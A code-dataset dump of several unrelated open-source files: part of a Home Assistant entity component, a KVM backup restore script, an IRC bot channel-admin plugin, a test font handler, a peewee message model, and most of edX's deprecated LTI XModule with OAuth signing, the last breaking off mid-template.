await self._platforms[key].async_setup(platform_config, discovery_info)
@callback
def _async_update_group(self):
"""Set up and/or update component group.
This method must be run in the event loop.
"""
if self.group_name is None:
return
ids = [entity.entity_id for entity in
sorted(self.entities,
key=lambda entity: entity.name or entity.entity_id)]
self.hass.async_create_task(
self.hass.services.async_call(
'group', 'set', dict(
object_id=slugify(self.group_name),
name=self.group_name,
visible=False,
entities=ids)))
async def _async_reset(self):
"""Remove entities and reset the entity component to initial values.
This method must be run in the event loop.
"""
tasks = [platform.async_reset() for platform
in self._platforms.values()]
if tasks:
await asyncio.wait(tasks, loop=self.hass.loop)
self._platforms = {
self.domain: self._platforms[self.domain]
}
self.config = None
if self.group_name is not None:
await self.hass.services.async_call(
'group', 'remove', dict(
object_id=slugify(self.group_name)))
async def async_remove_entity(self, entity_id):
"""Remove an entity managed by one of the platforms."""
for platform in self._platforms.values():
if entity_id in platform.entities:
await platform.async_remove_entity(entity_id)
async def async_prepare_reload(self):
"""Prepare reloading this entity component.
This method must be run in the event loop.
"""
try:
conf = await \
conf_util.async_hass_config_yaml(self.hass)
except HomeAssistantError as err:
self.logger.error(err)
return None
conf = conf_util.async_process_component_config(
self.hass, conf, self.domain)
if conf is None:
return None
await self._async_reset()
return conf
def _async_init_entity_platform(self, platform_type, platform,
scan_interval=None, entity_namespace=None):
"""Initialize an entity platform."""
if scan_interval is None:
scan_interval = self.scan_interval
return EntityPlatform(
hass=self.hass,
logger=self.logger,
domain=self.domain,
platform_name=platform_type,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=self._async_update_group,
)
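# --- Hedged usage sketch (added; not part of the original file) ---
# A domain integration of this era would typically create one component in
# its async_setup and hand platform loading over to it. The names _LOGGER,
# DOMAIN and config below are the integration's own and are assumed here:
#
#     component = EntityComponent(_LOGGER, DOMAIN, hass)
#     await component.async_setup(config)
#     # later, e.g. to target entities from a service call:
#     entities = component.async_extract_from_service(call)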
|
tinloaf/home-assistant
|
homeassistant/helpers/entity_component.py
|
Python
|
apache-2.0
| 10,538 | 0 |
"""
Given a KVM machine description file, parse its XML
and change the contents of the nodes "name" and "disk/source.file".
Usage:
python restore_kvm_backup.py \
-x '/kvm/backups/centos7-06/kvm/backups/centos7-06/20180924.0850.23/config.xml' \
-b '/kvm/backups/centos7-06/kvm/backups/centos7-06/20180924.0850.23/centos7-06.qcow2' \
-n 'centos7-06' \
-i '/kvm/images/centos7-06.qcow2';
"""
import argparse
import os
import subprocess
import sys
import xml.etree.ElementTree as et
from time import sleep
cli_parser = argparse.ArgumentParser()
cli_parser.add_argument("-x", "--xml-file", required=True,
help="the backup kvm xml configuration file "
"containing the machine description.")
cli_parser.add_argument("-b", "--backup-image-file", required=True,
help="the full path to the qcow2 image file to be restored")
cli_parser.add_argument("-n", "--vm-name", required=True,
help="image name of the vm to show on make status")
cli_parser.add_argument("-i", "--destination-image-file", required=True,
help="the full path to where the qcow2 image must be restored")
args = vars(cli_parser.parse_args())
XML_FILE = args['xml_file']
VM_NAME = args['vm_name']
BACKUP_IMAGE_FILE = args['backup_image_file']
IMAGE_FILE = args['destination_image_file']
XML_RESTORATION_FILE = '/tmp/restoration.xml'
if not os.path.exists(XML_FILE):
print('The backup VM XML config file was not found; cannot continue.')
sys.exit(1)
if not os.path.exists(BACKUP_IMAGE_FILE):
print('The backup image file was not found; cannot continue.')
sys.exit(1)
def change_backup_xml_configuration_to_restore_vm():
tree = et.parse(XML_FILE)
root = tree.getroot()
for name in root.iter('name'):
name.text = VM_NAME
for disk in root.iter('disk'):
for child in disk:
if child.tag == 'source' and child.attrib['file'].endswith('qcow2'):
child.attrib['file'] = IMAGE_FILE
break
tree.write(XML_RESTORATION_FILE)
print('DONE. The new XML file you must use to restore your VM '
'is at {}.'.format(XML_RESTORATION_FILE))
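# --- Illustrative sketch (added comment; element values are assumptions) ---
# The rewrite above turns a backup definition such as
#
#   <domain type='kvm'>
#     <name>old-name</name>
#     ...
#     <disk type='file' device='disk'>
#       <source file='/kvm/backups/.../centos7-06.qcow2'/>
#     </disk>
#   </domain>
#
# into one whose <name> text is VM_NAME and whose qcow2 <source file=...>
# points at IMAGE_FILE, leaving every other node untouched.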
if __name__ == "__main__":
print('Shutting down vm if it is active...')
subprocess.run(['sudo', 'virsh', 'shutdown', VM_NAME])
print('Removing existing vm...')
subprocess.run(['sudo', 'virsh', 'undefine', VM_NAME])
print('Removing disk for the existing vm...')
if os.path.exists(IMAGE_FILE):
os.unlink(IMAGE_FILE)
print('Changing backup kvm config to restoration...')
change_backup_xml_configuration_to_restore_vm()
print('Copying the backup disk as the vm disk...')
subprocess.run(['sudo', 'cp', '-farv', BACKUP_IMAGE_FILE, IMAGE_FILE])
print('Restoring vm to the backup image...')
subprocess.run(['sudo', 'virsh', '-c', 'qemu:///system', 'define', XML_RESTORATION_FILE])
print('Giving some time before starting the vm...')
sleep(5)
print('Starting the restored vm now...')
subprocess.run(['sudo', 'virsh', '-c', 'qemu:///system', 'start', VM_NAME])
print('DONE.')
|
tiagoprn/devops
|
shellscripts/kvm/restore_kvm_backup.py
|
Python
|
mit
| 3,178 | 0.002203 |
from ralybot import hook
def mode_cmd(mode, text, text_inp, chan, conn, notice):
""" generic mode setting function """
split = text_inp.split(" ")
if split[0].startswith("#"):
channel = split[0]
target = split[1]
notice("Attempting to {} {} in {}...".format(text, target, channel))
conn.send("MODE {} {} {}".format(channel, mode, target))
else:
channel = chan
target = split[0]
notice("Attempting to {} {} in {}...".format(text, target, channel))
conn.send("MODE {} {} {}".format(channel, mode, target))
def mode_cmd_no_target(mode, text, text_inp, chan, conn, notice):
""" generic mode setting function without a target"""
split = text_inp.split(" ")
if split[0].startswith("#"):
channel = split[0]
notice("Attempting to {} {}...".format(text, channel))
conn.send("MODE {} {}".format(channel, mode))
else:
channel = chan
notice("Attempting to {} {}...".format(text, channel))
conn.send("MODE {} {}".format(channel, mode))
@hook.command(permissions=["op_ban", "op"])
def ban(text, conn, chan, notice):
"""[channel] <user> - bans <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+b", "ban", text, chan, conn, notice)
@hook.command(permissions=["op_ban", "op"])
def unban(text, conn, chan, notice):
"""[channel] <user> - unbans <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-b", "unban", text, chan, conn, notice)
@hook.command(permissions=["op_quiet", "op"])
def quiet(text, conn, chan, notice):
"""[channel] <user> - quiets <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+q", "quiet", text, chan, conn, notice)
@hook.command(permissions=["op_quiet", "op"])
def unquiet(text, conn, chan, notice):
"""[channel] <user> - unquiets <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-q", "unquiet", text, chan, conn, notice)
@hook.command(permissions=["op_voice", "op"])
def voice(text, conn, chan, notice):
"""[channel] <user> - voices <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+v", "voice", text, chan, conn, notice)
@hook.command(permissions=["op_voice", "op"])
def devoice(text, conn, chan, notice):
"""[channel] <user> - devoices <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-v", "devoice", text, chan, conn, notice)
@hook.command(permissions=["op_op", "op"])
def op(text, conn, chan, notice):
"""[channel] <user> - ops <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+o", "op", text, chan, conn, notice)
@hook.command(permissions=["op_op", "op"])
def deop(text, conn, chan, notice):
"""[channel] <user> - deops <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-o", "deop", text, chan, conn, notice)
@hook.command(permissions=["op_topic", "op"])
def topic(text, conn, chan):
"""[channel] <topic> - changes the topic to <topic> in [channel], or in the caller's channel
if no channel is specified"""
split = text.split(" ")
if split[0].startswith("#"):
message = " ".join(split[1:])
chan = split[0]
else:
message = " ".join(split)
conn.send("TOPIC {} :{}".format(chan, message))
@hook.command(permissions=["op_kick", "op"])
def kick(text, chan, conn, notice):
"""[channel] <user> - kicks <user> from [channel], or from the caller's channel if no channel is specified"""
split = text.split(" ")
if split[0].startswith("#"):
channel = split[0]
target = split[1]
if len(split) > 2:
reason = " ".join(split[2:])
out = "KICK {} {}: {}".format(channel, target, reason)
else:
out = "KICK {} {}".format(channel, target)
else:
channel = chan
target = split[0]
if len(split) > 1:
reason = " ".join(split[1:])
out = "KICK {} {} :{}".format(channel, target, reason)
else:
out = "KICK {} {}".format(channel, target)
notice("Attempting to kick {} from {}...".format(target, channel))
conn.send(out)
@hook.command(permissions=["op_rem", "op"])
def remove(text, chan, conn):
"""[channel] <user> - force removes <user> from [channel], or in the caller's channel if no channel is specified"""
split = text.split(" ")
if split[0].startswith("#"):
message = " ".join(split[1:])
chan = split[0]
out = "REMOVE {} :{}".format(chan, message)
else:
message = " ".join(split)
out = "REMOVE {} :{}".format(chan, message)
conn.send(out)
@hook.command(permissions=["op_mute", "op"], autohelp=False)
def mute(text, conn, chan, notice):
"""[channel] - mutes [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("+m", "mute", text, chan, conn, notice)
@hook.command(permissions=["op_mute", "op"], autohelp=False)
def unmute(text, conn, chan, notice):
"""[channel] - unmutes [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("-m", "unmute", text, chan, conn, notice)
@hook.command(permissions=["op_lock", "op"], autohelp=False)
def lock(text, conn, chan, notice):
"""[channel] - locks [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("+i", "lock", text, chan, conn, notice)
@hook.command(permissions=["op_lock", "op"], autohelp=False)
def unlock(text, conn, chan, notice):
"""[channel] - unlocks [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("-i", "unlock", text, chan, conn, notice)
|
Jakeable/Ralybot
|
plugins/admin_channel.py
|
Python
|
gpl-3.0
| 5,871 | 0.002555 |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
def main(request, response):
headers = []
if 'Content-Type' in request.GET:
headers += [('Content-Type', request.GET['Content-Type'])]
with open('./resources/ahem/AHEM____.TTF', 'rb') as f:
return 200, headers, f.read()
|
benschulz/servo
|
tests/wpt/mozilla/tests/mozilla/resources/no_mime_type.py
|
Python
|
mpl-2.0
| 443 | 0 |
from persistence.models import Agent, BaseModel
from peewee import *
class Message(BaseModel):
"""description of class"""
correlationid = CharField()
category = IntegerField()
body = CharField(null=True)
sender = ForeignKeyField(Agent, related_name='send_messages')
receiver = ForeignKeyField(Agent, related_name='received_messages')
# flags
complete = BooleanField(default=False)
processed = BooleanField(default=False)
# computed
def get_body(self):
if self.body is not None:
return self.body
if not self.complete:
return None
messageparts = sorted(self.parts, key=lambda x: x.position)
body = ''.join([part.body for part in messageparts])
return body
def as_dict(self):
return {
'id': self.correlationid,
'sender': self.sender.name,
'reciever': self.receiver.name,
'category': self.category,
'body': self.get_body()
}
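# --- Hedged usage sketch (added; not part of the original file) ---
# `parts` is assumed to be the reverse relation of a message-part model (not
# shown) carrying `position` and `body` fields; once every part has arrived
# and `complete` is set, get_body() stitches them together in order:
#
#     message = Message.get(Message.correlationid == 'abc-123')
#     if message.complete:
#         payload = message.get_body()  # ordered concatenation of the parts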
|
onnovalkering/sparql-over-sms
|
sos-service/src/persistence/models/message.py
|
Python
|
mit
| 1,021 | 0.000979 |
"""
THIS MODULE IS DEPRECATED IN FAVOR OF https://github.com/edx/xblock-lti-consumer
Learning Tools Interoperability (LTI) module.
Resources
---------
Theoretical background and detailed specifications of LTI can be found on:
http://www.imsglobal.org/LTI/v1p1p1/ltiIMGv1p1p1.html
This module is based on the version 1.1.1 of the LTI specifications by the
IMS Global authority. For authentication, it uses OAuth1.
When responding to the LTI tool provider, we must issue a correct
response. The types of responses and their message payloads are documented at:
Table A1.2 Interpretation of the 'CodeMajor/severity' matrix.
http://www.imsglobal.org/gws/gwsv1p0/imsgws_wsdlBindv1p0.html
A resource to test the LTI protocol (PHP realization):
http://www.imsglobal.org/developers/LTI/test/v1p1/lms.php
We have also begun to add support for LTI 1.2/2.0. We will keep this
docstring in synch with what support is available. The first LTI 2.0
feature to be supported is the REST API results service, see specification
at
http://www.imsglobal.org/lti/ltiv2p0/uml/purl.imsglobal.org/vocab/lis/v2/outcomes/Result/service.html
What is supported:
------------------
1.) Display of simple LTI in iframe or a new window.
2.) Multiple LTI components on a single page.
3.) The use of multiple LTI providers per course.
4.) Use of advanced LTI component that provides back a grade.
A) LTI 1.1.1 XML endpoint
a.) The LTI provider sends back a grade to a specified URL.
b.) Currently only the "update" action is supported; "read" and "delete"
actions initially weren't required.
B) LTI 2.0 Result Service JSON REST endpoint
(http://www.imsglobal.org/lti/ltiv2p0/uml/purl.imsglobal.org/vocab/lis/v2/outcomes/Result/service.html)
a.) Discovery of all such LTI http endpoints for a course. External tools GET from this discovery
endpoint and receive URLs for interacting with individual grading units.
(see lms/djangoapps/courseware/views/views.py:get_course_lti_endpoints)
b.) GET, PUT and DELETE in LTI Result JSON binding
(http://www.imsglobal.org/lti/ltiv2p0/mediatype/application/vnd/ims/lis/v2/result+json/index.html)
for a provider to synchronize grades into edx-platform. Reading, Setting, and Deleteing
Numeric grades between 0 and 1 and text + basic HTML feedback comments are supported, via
GET / PUT / DELETE HTTP methods respectively
"""
from __future__ import absolute_import
import base64
import datetime
import hashlib
import logging
import textwrap
from xml.sax.saxutils import escape
from pkg_resources import resource_string
import bleach
import mock
import oauthlib.oauth1
import six
import six.moves.urllib.parse
from lxml import etree
from oauthlib.oauth1.rfc5849 import signature
from pytz import UTC
from six import text_type
from webob import Response
from xblock.core import List, Scope, String, XBlock
from xblock.fields import Boolean, Float
from xmodule.editing_module import MetadataOnlyEditingDescriptor
from xmodule.lti_2_util import LTI20ModuleMixin, LTIError
from xmodule.raw_module import EmptyDataRawDescriptor
from xmodule.x_module import XModule, module_attr
log = logging.getLogger(__name__)
DOCS_ANCHOR_TAG_OPEN = (
"<a target='_blank' "
"href='https://edx.readthedocs.io/projects/edx-partner-course-staff/en/latest/exercises_tools/lti_component.html'>"
)
# Make '_' a no-op so we can scrape strings. Using lambda instead of
# `django.utils.translation.ugettext_noop` because Django cannot be imported in this file
_ = lambda text: text
class LTIFields(object):
"""
Fields to define and obtain LTI tool from provider are set here,
except credentials, which should be set in course settings::
`lti_id` is id to connect tool with credentials in course settings. It should not contain :: (double semicolon)
`launch_url` is launch URL of tool.
`custom_parameters` are additional parameters used to navigate to the proper book and page.
For example, for the Vitalsource provider, `launch_url` should be
*https://bc-staging.vitalsource.com/books/book*,
and to get to proper book and book page, you should set custom parameters as::
vbid=put_book_id_here
book_location=page/put_page_number_here
A non-empty default URL for `launch_url` is needed because oauthlib requires a URL scheme to be present::
https://github.com/idan/oauthlib/blob/master/oauthlib/oauth1/rfc5849/signature.py#L136
"""
display_name = String(
display_name=_("Display Name"),
help=_(
"The display name for this component. "
"Analytics reports may also use the display name to identify this component."
),
scope=Scope.settings,
default="LTI",
)
lti_id = String(
display_name=_("LTI ID"),
help=_(
"Enter the LTI ID for the external LTI provider. "
"This value must be the same LTI ID that you entered in the "
"LTI Passports setting on the Advanced Settings page."
"<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting."
).format(
docs_anchor_open=DOCS_ANCHOR_TAG_OPEN,
anchor_close="</a>"
),
default='',
scope=Scope.settings
)
launch_url = String(
display_name=_("LTI URL"),
help=_(
"Enter the URL of the external tool that this component launches. "
"This setting is only used when Hide External Tool is set to False."
"<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting."
).format(
docs_anchor_open=DOCS_ANCHOR_TAG_OPEN,
anchor_close="</a>"
),
default='http://www.example.com',
scope=Scope.settings)
custom_parameters = List(
display_name=_("Custom Parameters"),
help=_(
"Add the key/value pair for any custom parameters, such as the page your e-book should open to or "
"the background color for this component."
"<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting."
).format(
docs_anchor_open=DOCS_ANCHOR_TAG_OPEN,
anchor_close="</a>"
),
scope=Scope.settings)
open_in_a_new_page = Boolean(
display_name=_("Open in New Page"),
help=_(
"Select True if you want students to click a link that opens the LTI tool in a new window. "
"Select False if you want the LTI content to open in an IFrame in the current page. "
"This setting is only used when Hide External Tool is set to False. "
),
default=True,
scope=Scope.settings
)
has_score = Boolean(
display_name=_("Scored"),
help=_(
"Select True if this component will receive a numerical score from the external LTI system."
),
default=False,
scope=Scope.settings
)
weight = Float(
display_name=_("Weight"),
help=_(
"Enter the number of points possible for this component. "
"The default value is 1.0. "
"This setting is only used when Scored is set to True."
),
default=1.0,
scope=Scope.settings,
values={"min": 0},
)
module_score = Float(
help=_("The score kept in the xblock KVS -- duplicate of the published score in django DB"),
default=None,
scope=Scope.user_state
)
score_comment = String(
help=_("Comment as returned from grader, LTI2.0 spec"),
default="",
scope=Scope.user_state
)
hide_launch = Boolean(
display_name=_("Hide External Tool"),
help=_(
"Select True if you want to use this component as a placeholder for syncing with an external grading "
"system rather than launch an external tool. "
"This setting hides the Launch button and any IFrames for this component."
),
default=False,
scope=Scope.settings
)
# Users will be presented with a message indicating that their e-mail/username would be sent to a third
# party application. When "Open in New Page" is not selected, the tool automatically appears without any user action.
ask_to_send_username = Boolean(
display_name=_("Request user's username"),
# Translators: This is used to request the user's username for a third party service.
help=_("Select True to request the user's username."),
default=False,
scope=Scope.settings
)
ask_to_send_email = Boolean(
display_name=_("Request user's email"),
# Translators: This is used to request the user's email for a third party service.
help=_("Select True to request the user's email address."),
default=False,
scope=Scope.settings
)
description = String(
display_name=_("LTI Application Information"),
help=_(
"Enter a description of the third party application. If requesting username and/or email, use this text box to inform users "
"why their username and/or email will be forwarded to a third party application."
),
default="",
scope=Scope.settings
)
button_text = String(
display_name=_("Button Text"),
help=_(
"Enter the text on the button used to launch the third party application."
),
default="",
scope=Scope.settings
)
accept_grades_past_due = Boolean(
display_name=_("Accept grades past deadline"),
help=_("Select True to allow third party systems to post grades past the deadline."),
default=True,
scope=Scope.settings
)
class LTIModule(LTIFields, LTI20ModuleMixin, XModule):
"""
THIS MODULE IS DEPRECATED IN FAVOR OF https://github.com/edx/xblock-lti-consumer
This module provides LTI integration for a course.
In addition to the usual XModule structure, it performs OAuth signing.
How it works::
1. Get credentials from course settings.
2. There is a minimal set of parameters that need to be signed (shown here for Vitalsource)::
user_id
oauth_callback
lis_outcome_service_url
lis_result_sourcedid
launch_presentation_return_url
lti_message_type
lti_version
roles
*+ all custom parameters*
These parameters should be encoded and signed by *OAuth1* together with
`launch_url` and *POST* request type.
3. Signing proceeds with client key/secret pair obtained from course settings.
That pair should be obtained from LTI provider and set into course settings by course author.
After that signature and other OAuth data are generated.
OAuth data which is generated after signing is usual::
oauth_callback
oauth_nonce
oauth_consumer_key
oauth_signature_method
oauth_timestamp
oauth_version
4. All of that data is passed to the form and sent to the LTI provider's
server by the browser via JavaScript autosubmit.
Form example::
<form
action="${launch_url}"
name="ltiLaunchForm-${element_id}"
class="ltiLaunchForm"
method="post"
target="ltiLaunchFrame-${element_id}"
encType="application/x-www-form-urlencoded"
>
<input name="launch_presentation_return_url" value="" />
<input name="lis_outcome_service_url" value="" />
<input name="lis_result_sourcedid" value="" />
<input name="lti_message_type" value="basic-lti-launch-request" />
<input name="lti_version" value="LTI-1p0" />
<input name="oauth_callback" value="about:blank" />
<input name="oauth_consumer_key" value="${oauth_consumer_key}" />
<input name="oauth_nonce" value="${oauth_nonce}" />
<input name="oauth_signature_method" value="HMAC-SHA1" />
<input name="oauth_timestamp" value="${oauth_timestamp}" />
<input name="oauth_version" value="1.0" />
<input name="user_id" value="${user_id}" />
<input name="role" value="student" />
<input name="oauth_signature" value="${oauth_signature}" />
<input name="custom_1" value="${custom_param_1_value}" />
<input name="custom_2" value="${custom_param_2_value}" />
<input name="custom_..." value="${custom_param_..._value}" />
<input type="submit" value="Press to Launch" />
</form>
5. The LTI provider has the same secret key; it signs the data string via *OAuth1* and compares signatures.
If the signatures match, the LTI provider redirects the iframe source to the LTI tool web page,
and the LTI tool is rendered in the iframe inside the course.
Otherwise, an error message from the LTI provider is shown.
"""
js = {
'js': [
resource_string(__name__, 'js/src/lti/lti.js')
]
}
css = {'scss': [resource_string(__name__, 'css/lti/lti.scss')]}
js_module_name = "LTI"
def get_input_fields(self):
# LTI provides a list of default parameters that might be passed as
# part of the POST data. These parameters should not be prefixed.
# Likewise, The creator of an LTI link can add custom key/value parameters
# to a launch which are to be included with the launch of the LTI link.
# In this case, we will automatically add `custom_` prefix before this parameters.
# See http://www.imsglobal.org/LTI/v1p1p1/ltiIMGv1p1p1.html#_Toc316828520
PARAMETERS = [
"lti_message_type",
"lti_version",
"resource_link_title",
"resource_link_description",
"user_image",
"lis_person_name_given",
"lis_person_name_family",
"lis_person_name_full",
"lis_person_contact_email_primary",
"lis_person_sourcedid",
"role_scope_mentor",
"context_type",
"context_title",
"context_label",
"launch_presentation_locale",
"launch_presentation_document_target",
"launch_presentation_css_url",
"launch_presentation_width",
"launch_presentation_height",
"launch_presentation_return_url",
"tool_consumer_info_product_family_code",
"tool_consumer_info_version",
"tool_consumer_instance_guid",
"tool_consumer_instance_name",
"tool_consumer_instance_description",
"tool_consumer_instance_url",
"tool_consumer_instance_contact_email",
]
client_key, client_secret = self.get_client_key_secret()
# parsing custom parameters to dict
custom_parameters = {}
for custom_parameter in self.custom_parameters:
try:
param_name, param_value = [p.strip() for p in custom_parameter.split('=', 1)]
except ValueError:
_ = self.runtime.service(self, "i18n").ugettext
msg = _('Could not parse custom parameter: {custom_parameter}. Should be "x=y" string.').format(
custom_parameter="{0!r}".format(custom_parameter)
)
raise LTIError(msg)
# LTI specs: 'custom_' should be prepended before each custom parameter, as pointed in link above.
if param_name not in PARAMETERS:
param_name = 'custom_' + param_name
custom_parameters[six.text_type(param_name)] = six.text_type(param_value)
return self.oauth_params(
custom_parameters,
client_key,
client_secret,
)
def get_context(self):
"""
Returns a context.
"""
# use bleach defaults. see https://github.com/jsocol/bleach/blob/master/bleach/__init__.py
# ALLOWED_TAGS are
# ['a', 'abbr', 'acronym', 'b', 'blockquote', 'code', 'em', 'i', 'li', 'ol', 'strong', 'ul']
#
# ALLOWED_ATTRIBUTES are
# 'a': ['href', 'title'],
# 'abbr': ['title'],
# 'acronym': ['title'],
#
# This lets all plaintext through.
sanitized_comment = bleach.clean(self.score_comment)
return {
'input_fields': self.get_input_fields(),
# These parameters do not participate in OAuth signing.
'launch_url': self.launch_url.strip(),
'element_id': self.location.html_id(),
'element_class': self.category,
'open_in_a_new_page': self.open_in_a_new_page,
'display_name': self.display_name,
'form_url': self.runtime.handler_url(self, 'preview_handler').rstrip('/?'),
'hide_launch': self.hide_launch,
'has_score': self.has_score,
'weight': self.weight,
'module_score': self.module_score,
'comment': sanitized_comment,
'description': self.description,
'ask_to_send_username': self.ask_to_send_username,
'ask_to_send_email': self.ask_to_send_email,
'button_text': self.button_text,
'accept_grades_past_due': self.accept_grades_past_due,
}
def get_html(self):
"""
Renders parameters to template.
"""
return self.system.render_template('lti.html', self.get_context())
@XBlock.handler
def preview_handler(self, _, __):
"""
This is called to get context with new oauth params to iframe.
"""
template = self.system.render_template('lti_form.html', self.get_context())
return Response(template, content_type='text/html')
def get_user_id(self):
user_id = self.runtime.anonymous_student_id
assert user_id is not None
return six.text_type(six.moves.urllib.parse.quote(user_id))
def get_outcome_service_url(self, service_name="grade_handler"):
"""
Return URL for storing grades.
To test LTI on sandbox we must use http scheme.
While testing locally and on Jenkins, mock_lti_server use http.referer
to obtain scheme, so it is ok to have http(s) anyway.
The scheme logic is handled in lms/lib/xblock/runtime.py
"""
return self.runtime.handler_url(self, service_name, thirdparty=True).rstrip('/?')
def get_resource_link_id(self):
"""
This is an opaque unique identifier that the TC guarantees will be unique
within the TC for every placement of the link.
If the tool / activity is placed multiple times in the same context,
each of those placements will be distinct.
This value will also change if the item is exported from one system or
context and imported into another system or context.
This parameter is required.
Example: u'edx.org-i4x-2-3-lti-31de800015cf4afb973356dbe81496df'
Hostname, edx.org,
makes resource_link_id change on import to another system.
Last part of location, location.name - 31de800015cf4afb973356dbe81496df,
is random hash, updated by course_id,
this makes resource_link_id unique inside single course.
First part of location is tag-org-course-category, i4x-2-3-lti.
Location.name itself does not change on import to another course,
but org and course_id change.
So together with org and course_id in a form of
i4x-2-3-lti-31de800015cf4afb973356dbe81496df this part of resource_link_id:
makes resource_link_id to be unique among courses inside same system.
"""
return six.text_type(six.moves.urllib.parse.quote("{}-{}".format(self.system.hostname, self.location.html_id())))
def get_lis_result_sourcedid(self):
"""
This field contains an identifier that indicates the LIS Result Identifier (if any)
associated with this launch. This field identifies a unique row and column within the
TC gradebook. This field is unique for every combination of context_id / resource_link_id / user_id.
This value may change for a particular resource_link_id / user_id from one launch to the next.
The TP should only retain the most recent value for this field for a particular resource_link_id / user_id.
This field is generally optional, but is required for grading.
"""
return "{context}:{resource_link}:{user_id}".format(
context=six.moves.urllib.parse.quote(self.context_id),
resource_link=self.get_resource_link_id(),
user_id=self.get_user_id()
)
def get_course(self):
"""
Return course by course id.
"""
return self.descriptor.runtime.modulestore.get_course(self.course_id)
@property
def context_id(self):
"""
Return context_id.
context_id is an opaque identifier that uniquely identifies the context (e.g., a course)
that contains the link being launched.
"""
return text_type(self.course_id)
@property
def role(self):
"""
Get system user role and convert it to LTI role.
"""
roles = {
'student': u'Student',
'staff': u'Administrator',
'instructor': u'Instructor',
}
return roles.get(self.system.get_user_role(), u'Student')
def oauth_params(self, custom_parameters, client_key, client_secret):
"""
Signs request and returns signature and OAuth parameters.
`custom_parameters` is a dict of parsed `custom_parameter` fields
`client_key` and `client_secret` are LTI tool credentials.
Also *anonymous student id* is passed to template and therefore to LTI provider.
"""
client = oauthlib.oauth1.Client(
client_key=text_type(client_key),
client_secret=text_type(client_secret)
)
# Must have parameters for correct signing from LTI:
body = {
u'user_id': self.get_user_id(),
u'oauth_callback': u'about:blank',
u'launch_presentation_return_url': '',
u'lti_message_type': u'basic-lti-launch-request',
u'lti_version': 'LTI-1p0',
u'roles': self.role,
# Parameters required for grading:
u'resource_link_id': self.get_resource_link_id(),
u'lis_result_sourcedid': self.get_lis_result_sourcedid(),
u'context_id': self.context_id,
}
if self.has_score:
body.update({
u'lis_outcome_service_url': self.get_outcome_service_url()
})
self.user_email = ""
self.user_username = ""
# Username and email can't be sent in studio mode, because the user object is not defined.
# To test this functionality, test in the LMS.
if callable(self.runtime.get_real_user):
real_user_object = self.runtime.get_real_user(self.runtime.anonymous_student_id)
try:
self.user_email = real_user_object.email
except AttributeError:
self.user_email = ""
try:
self.user_username = real_user_object.username
except AttributeError:
self.user_username = ""
if self.ask_to_send_username and self.user_username:
body["lis_person_sourcedid"] = self.user_username
if self.ask_to_send_email and self.user_email:
body["lis_person_contact_email_primary"] = self.user_email
# Appending custom parameter for signing.
body.update(custom_parameters)
headers = {
# This is needed for body encoding:
'Content-Type': 'application/x-www-form-urlencoded',
}
try:
__, headers, __ = client.sign(
six.text_type(self.launch_url.strip()),
http_method=u'POST',
body=body,
headers=headers)
except ValueError: # Scheme not in url.
# https://github.com/idan/oauthlib/blob/master/oauthlib/oauth1/rfc5849/signature.py#L136
# Stubbing headers for now:
log.info(
u"LTI module %s in course %s does not have oauth parameters correctly configured.",
self.location,
self.location.course_key,
)
headers = {
u'Content-Type': u'application/x-www-form-urlencoded',
u'Authorization': u'OAuth oauth_nonce="80966668944732164491378916897", \
oauth_timestamp="1378916897", oauth_version="1.0", oauth_signature_method="HMAC-SHA1", \
oauth_consumer_key="", oauth_signature="frVp4JuvT1mVXlxktiAUjQ7%2F1cw%3D"'}
params = headers['Authorization']
# Parse headers to pass to template as part of context:
params = dict([param.strip().replace('"', '').split('=') for param in params.split(',')])
params[u'oauth_nonce'] = params[u'OAuth oauth_nonce']
del params[u'OAuth oauth_nonce']
# oauthlib encodes signature with
# 'Content-Type': 'application/x-www-form-urlencoded'
# so '=' becomes '%3D'.
# We send form via browser, so browser will encode it again,
# So we need to decode signature back:
params[u'oauth_signature'] = six.moves.urllib.parse.unquote(params[u'oauth_signature']).decode('utf8')
# Add LTI parameters to OAuth parameters for sending in form.
params.update(body)
return params
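# Illustration (added comment; values echo the stub above): the dict handed
# back to the template mixes OAuth fields with the LTI launch fields, e.g.
#   {'oauth_nonce': '80966668944732164491378916897',
#    'oauth_timestamp': '1378916897',
#    'oauth_signature': 'frVp4JuvT1mVXlxktiAUjQ7/1cw=',
#    'lti_message_type': 'basic-lti-launch-request',
#    'lti_version': 'LTI-1p0', 'user_id': '...', ...}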
@XBlock.handler
def grade_handler(self, request, suffix): # pylint: disable=unused-argument
"""
This is called by courseware.module_render, to handle an AJAX call.
Used only for grading. Returns XML response.
Example of request body from LTI provider::
<?xml version = "1.0" encoding = "UTF-8"?>
<imsx_POXEnvelopeRequest xmlns = "some_link (may be not required)">
<imsx_POXHeader>
<imsx_POXRequestHeaderInfo>
<imsx_version>V1.0</imsx_version>
<imsx_messageIdentifier>528243ba5241b</imsx_messageIdentifier>
</imsx_POXRequestHeaderInfo>
</imsx_POXHeader>
<imsx_POXBody>
<replaceResultRequest>
<resultRecord>
<sourcedGUID>
<sourcedId>feb-123-456-2929::28883</sourcedId>
</sourcedGUID>
<result>
<resultScore>
<language>en-us</language>
<textString>0.4</textString>
</resultScore>
</result>
</resultRecord>
</replaceResultRequest>
</imsx_POXBody>
</imsx_POXEnvelopeRequest>
Example of correct/incorrect answer XML body:: see response_xml_template.
"""
response_xml_template = textwrap.dedent("""\
<?xml version="1.0" encoding="UTF-8"?>
<imsx_POXEnvelopeResponse xmlns = "http://www.imsglobal.org/services/ltiv1p1/xsd/imsoms_v1p0">
<imsx_POXHeader>
